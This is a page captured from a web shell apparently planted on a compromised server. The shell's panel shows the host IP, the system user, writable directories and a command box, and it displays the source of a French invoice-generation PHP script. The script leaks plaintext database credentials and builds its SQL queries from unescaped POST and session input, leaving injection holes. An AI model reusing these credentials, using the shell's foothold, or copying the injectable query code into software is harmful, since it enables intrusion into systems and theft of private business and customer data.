403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.231
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/factures/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/factures/public_html/Generer_facture.php
<?php

session_start();

if (!isset($_SESSION['compte_user']))

{

header('Location: erreur_surfing.html');

exit();

}

if (!isset($_SESSION['r_devis']))

{

header('Location: DEVIS.php');

exit();

}

$link = mysqli_connect("localhost", "c0invoices", "sUYo5cQ9@","c0invoices") or die("Impossible de se connecter : " . mysqli_error());


$year = date("y");
$fullyear = date("Y");
if ( $_POST['dest'] == 'Standard' ) {

	$retour =mysqli_query($link,'SELECT * FROM factures where type_facture = "Standard" and `refe_system_fisc` = YEAR(CURRENT_DATE())  ORDER BY `id_facture` DESC LIMIT 0, 1');

	$valeur = mysqli_fetch_assoc($retour);
	
	$a = substr( $valeur['ref_facture'], strpos( $valeur['ref_facture'], "/") + 1);
	
	$a += 1 ;
	
	$x ='F0'.$year.'/'.$a;
 
}

else {

	$retour =mysqli_query($link,'SELECT * FROM factures where type_facture = "Comptable" and `refe_system_fisc` = YEAR(CURRENT_DATE())  ORDER BY `id_facture` DESC LIMIT 0, 1');

	$valeur = mysqli_fetch_assoc($retour);
	
	$a = substr( $valeur['ref_facture'], strpos( $valeur['ref_facture'], "/") + 1);
	
	$a += 1 ;
	
	
	
	$x ='FC0'.$year.'/'.$a;

}



$_SESSION['r_facture'] = $x;



$b = date('H:i');

$c = date('d-m-Y');

$dt = $c . ' [ '. $b . ' ]';

// DEVIS ->

$repd = "select * from devis where ref_devis = '$_SESSION[r_devis]';";

$execd = mysqli_query($link,$repd);

$numd = mysqli_fetch_assoc($execd);

$clt = $numd['ref_client'];

//Test QTE STOCK

$Erreur = 'NON';

$repd1 = "select * from detail_devis where ref_devis = '$_SESSION[r_devis]';";

$execd1 = mysqli_query($link,$repd1);

while ($rowasa1 = mysqli_fetch_assoc($execd1)) {

	$rear = "select * from article_service where id_art_serv = $rowasa1[ref_as];";

	$exear = mysqli_query($link,$rear);

	$numar = mysqli_fetch_assoc($exear);

	if ( $numar['type_as']== 'Article' )

	{

		if ( $rowasa1[qte] > $numar[qte_stock] )

		{

			$Erreur = 'OUI';

		}

		else

		{

			$diff = $numar[qte_stock] - $rowasa1[qte];

			$reponse = "UPDATE  article_service SET qte_stock = $diff where id_art_serv = $numar[id_art_serv] ;";

			

			mysqli_query($link,$reponse);

		}	

	}	

}

if ( $Erreur == 'OUI' ) {

header('Location: Erreur_stk_DEVIS.html');

exit();

}

else

{

//Ajout Facture
 
$reponse = "INSERT INTO factures VALUES(id_facture ,'$x' , $clt ,'$_POST[date_fac]' , 'Valide','$_SESSION[r_devis]' , '$_POST[dest]','$fullyear',1)";
 
mysqli_query($link,$reponse);

//Notification

$reponse = "select * from comptes_user where id_clt = $_SESSION[compte_user] ;";

$exec =mysqli_query($link,$reponse);

$row = mysqli_fetch_assoc($exec);

$a = $row['nom'].' vient de creer une nouvelle Facture : '.$x.'. Source = DEVIS';

$reponse = "INSERT INTO notification VALUES(id_notif ,'dripicons-user-group','$a' ,'$dt', 'ADMIN');";

mysqli_query($link,$reponse);

unset($_SESSION['r_devis']);

header('Location: Select_facture.php?aux='.$x);

exit();



mysql_close($link);

}

 

?>

Youez - 2016 - github.com/yon3zu
LinuXploit